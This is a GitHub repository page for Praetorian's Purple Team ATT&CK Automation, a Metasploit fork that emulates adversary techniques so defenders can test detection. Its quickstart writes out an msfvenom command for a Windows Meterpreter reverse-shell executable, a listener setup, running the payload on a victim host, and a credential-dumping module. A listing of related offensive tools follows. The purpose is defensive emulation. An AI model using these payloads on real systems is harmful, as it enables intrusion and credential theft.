• This repository has been archived on 09/Apr/2024
  • Stars
    star
    713
  • Rank 63,511 (Top 2 %)
  • Language
    Ruby
  • License
    Other
  • Created over 5 years ago
  • Updated almost 5 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs

The Metasploit Framework is released under a BSD-style license. See COPYING for more details.

Purple Team ATT&CK™ Automation

At Praetorian, we were seeking a way to automatically emulate adversary tactics in order to evaluate detection and response capabilities. Our solution implements MITRE ATT&CK™ TTPs as Metasploit Framework post modules. As of this release, we've automated a little over 100 TTPs as modules.

Metasploit's advantage is its robust library, capability to interact with operating system APIs, and its flexible license. In addition, we're able to emulate the features of other tools such as in-memory .NET execution via leveraging Metasploit's execute_powershell functionality. This allows Blue Teams to ensure that their tools are alerting on the actual TTP behavior and not execution artifacts (such as encoded PowerShell).

Our solution is built on top of the latest version of Metasploit as of 09Apr2019 (pulled from: https://github.com/rapid7/metasploit-framework). We’ve made minor modifications to Metasploit’s code base to enable some of the automation. Everything should work as intended if you’re already familiar with Metasploit. The magic happens after you establish a Meterpreter session and run a TTP as a post-exploitation module.

We're open sourcing our work because we believe in solving the cybersecurity problem. By giving Blue Teams more tools to emulate adversary behavior, we hope to improve their capabilities and reduce the still very high average dwell time.

Wiki

For detailed opertional usage guidance and a full list of modules and changes, please view the GitHub Wiki.

Quickstart

Quick start video guide

Quick start video guide: https://youtu.be/o3Qb_0clIpg

Installation should follow the instructions for installing a Metasploit Docker environment: https://github.com/rapid7/metasploit-framework/tree/master/docker

In general:

  • Install Docker
  • git clone https://github.com/praetorian-code/purple-team-attack-automation.git
  • Edit ./docker-compose.local.override.yml to reflect the LHOST of your local system similar to below. By default, port 4444 will be forwarded to the docker container. If you want to use other ports, for instance to mirror HTTPS, you'll have to add them to this file.
version: '3'
services:
  ms:
    environment:
      # example of setting LHOST
      LHOST: 10.0.8.2
    # example of adding more ports
    ports:
      - 8080:8080
      - 443:443
  • Add / Remove further ports or IP addresses as you see fit. Don't forget to change the LHOST to your own IP address.
  • Make sure you set LHOST to valid hostname that resolves to your host machine.
  • Now you need to set the COMPOSE_FILE environment variable to load your local override.
echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
  • docker-compose build
  • Start the container with ./docker/bin/msfconsole
  • Generate a Meterpreter payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Attacker IP Address> LPORT=4444 -f exe > meterpreter.exe
  • Start and run a local listener:
 use exploit/multi/handler
 set PAYLOAD windows/meterpreter/reverse_tcp
 set LHOST <Attacker IP Address>
 set LPORT 4444
 exploit -j -z

Copy and run meterpreter.exe on the target (“victim”) host as admin and wait for a session.

  • Run a TTP as a post-exploitation module. The list of modules is provided below. For example, to start the 'Credential Dumping (T1003)’ module, run:
use modules/post/windows/purple/t1003
info
set session 1
run

Meterpreter Payloads

Praetorian recommends you utilize the nightly installers in order to run msfvenom to create your payloads.

Common Errors

ERROR: Couldn't connect to Docker daemon at http+docker://localunixsocket - is it running?

Solved by

service docker start

Future Work

  • Integrate the container into a fork of DetectionLab
  • Compare execution of CALDERA and MSF and how artifacts differ so we can improve adversary emulation
  • Leverage the MSFRPCD to facilitate automatic attack chaining

Contact

If you're interested in our Purple Team services, please contact us online or read more about "Why Praetorian Benchmarks to MITRE ATT&CK™ and Why You Should Too".

If you're an engineer looking to join our great team, we have openings at our careers page.

Contributing

See the Contribution Guide for a step-by-step guide to making a module.

Also, follow the Metasploit Framework's general contributing guidelines.

Acknowledgements

We'd like to thank various members of the security community for providing a lot of the techniques and code that we integrated into this project.

At Praetorian, the following engineers helped contribute modules:

  • Josh Abraham jabra [at] spl0it.org and @jabra
  • Abraham Adberstein
  • Tanner Harper
  • Thomas Hendrickson github.com/tomis007
  • George Jouldjian
  • Dallas Kaman
  • Blake Luther
  • Matt Schneider
  • Matthew Verrette
  • Daniel Wyleczuk-Stern @daniel_infosec

More Repositories

1

gokart

A static analysis tool for securing Go code
Go
2,176
star
2

noseyparker

Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.
Rust
1,657
star
3

Hob0Rules

Password cracking rules for Hashcat based on statistics and industry patterns
1,441
star
4

pentestly

Python and Powershell internal penetration testing framework
Python
717
star
5

PortBender

TCP Port Redirection Utility
C
668
star
6

DVRF

The Damn Vulnerable Router Firmware Project
HTML
668
star
7

fingerprintx

Standalone utility for service discovery on open ports!
Go
561
star
8

gato

GitHub Actions Pipeline Enumeration and Attack Tool
Python
539
star
9

trudy

A transparent proxy that can modify and drop traffic for arbitrary TCP connections.
Go
275
star
10

pyshell

PyShell makes interacting with web-based command injection less painful, emulating the feel of an interactive shell as much as possible.
Python
253
star
11

mitm-vm

An easy-to-deploy virtual machine that can provide flexible man-in-the-middle capabilities.
Shell
195
star
12

gladius

Automated Responder/secretsdump.py cracking
Python
181
star
13

snowcat

a tool to audit the istio service mesh
Go
173
star
14

vulcan

a tool to make it easy and fast to test various forms of injection
C++
172
star
15

ADFSRelay

Proof of Concept Utilities Developed to Research NTLM Relaying Attacks Targeting ADFS
Go
171
star
16

goffloader

A Go implementation of Cobalt Strike style BOF/COFF loaders.
Go
151
star
17

trident

automated password spraying tool
Go
145
star
18

NTLMRecon

A tool for performing light brute-forcing of HTTP servers to identify commonly accessible NTLM authentication endpoints.
Go
79
star
19

epictreasure

radare, angr, pwndbg, binjitsu, ect in a box ready for pwning
Shell
75
star
20

INTRACTABLEGIRAFFE

A Proof of Concept Rootkit Demonstrating Keylogging and Virtual File System (VFS) Capabilities
C
73
star
21

hashcatJS

An implementation of the hashcat rules engine in javascript
JavaScript
47
star
22

proxylogon-exploit

Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065. Unauthenticated RCE in Exchange.
Python
45
star
23

slack-c2bot

Slack C2bot that executes commands and returns the output.
Go
44
star
24

ruby_hashcat

Command line wrapper, Library, and Rest API for oclHashcat.
Ruby
40
star
25

dert

DNS Enumeration and Reconnaissance Tool
Ruby
37
star
26

Matryoshka

Matryoshka loader is a tool that red team operators can leverage to generate shellcode for Microsoft Office document phishing payloads.
C
37
star
27

Okta_Watering_Hole

Next Generation Phishing Tool For Internal / Red Teams
Python
35
star
28

ctf-writeups

Collection of Praetorian solutions to CTF challenges
OpenEdge ABL
25
star
29

chariot-ui

Chariot Offensive Security Platform
TypeScript
21
star
30

konstellation

Konstellation is a configuration-driven CLI tool to enumerate cloud resources and store the data into Neo4j.
Cypher
19
star
31

bsidesaustin

Python
14
star
32

chariot-launch-nuclei-templates

12
star
33

burp-wcf-gzip

Burp extension for decoding WCF-gzipped requests.
Python
12
star
34

gcloud-lockdown

Scripts to demonstrate VPC Service Controls between tenant and shared projects
Shell
12
star
35

highlight

Text file to BMP image with box drawing and blurring from the command line
C
9
star
36

log4j-detector

Log4j detector and reporting server for scalable detection of vulnerable running processes.
Go
7
star
37

sonicwall-nsv-decrypter

C
6
star
38

aws-labs

Shell
5
star
39

tpm_bound_sa_key

Go
5
star
40

rpi-setup

set up rpi for zbwardrive
Python
5
star
41

zeroqlik-detect

A Nuclei template to detect ZeroQlik (CVE-2023-41265 and CVE-2023-41266)
4
star
42

product-frontend-interview

JavaScript
3
star
43

product-backend-interview

Java
1
star
44

praetorian-cli

CLI and SDK for interacting with the Praetorian Chariot platform
Python
1
star